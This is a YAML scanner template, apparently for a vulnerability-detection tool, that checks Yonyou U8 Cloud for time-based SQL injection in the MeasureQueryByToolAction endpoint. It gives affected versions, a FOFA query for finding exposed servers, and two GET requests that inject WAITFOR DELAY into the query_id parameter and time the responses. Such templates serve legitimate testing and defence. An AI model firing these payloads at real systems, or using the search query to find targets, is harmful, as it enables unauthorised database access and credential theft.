product: 用友U8-Cloud
vName: 用友U8 Cloud MeasureQueryByToolAction SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NC-Cloud大型企业数字化平台，深度应用新一代数字智能技术，完全基于云原生架构，打造开放、互联、融合、智能的一体化云平台，聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向，提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案，帮助大型企业全面落地数智化。该系统MeasureQueryByToolAction接口存在SQL注入漏洞，恶意攻击者可能会利用该漏洞执行恶意SQL语句，查看用户名密码等，造成信息泄露，最终可能会导致服务器失陷。
version: version = 1.0、2.0-2.7、3.0、3.1、3.2、3.5、3.6、3.6sp、5.0、5.0sp
note: ''
search:
  FOFA: app="用友-U8-Cloud" || body="/api/uclient/public/"
protocol: http
link: https://blog.csdn.net/weixin_52204925/article/details/137219622
fix:
  - 升级至安全版本。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /service/~iufo/com.ufida.web.response.ActionServlet?response=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1');WAITFOR DELAY '0:0:5'-- -
      header:
        Content-Type: application/json
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /service/~iufo/com.ufida.web.response.ActionServlet?response=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1');WAITFOR DELAY '0:0:0'-- -
      header:
        Content-Type: application/json
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3
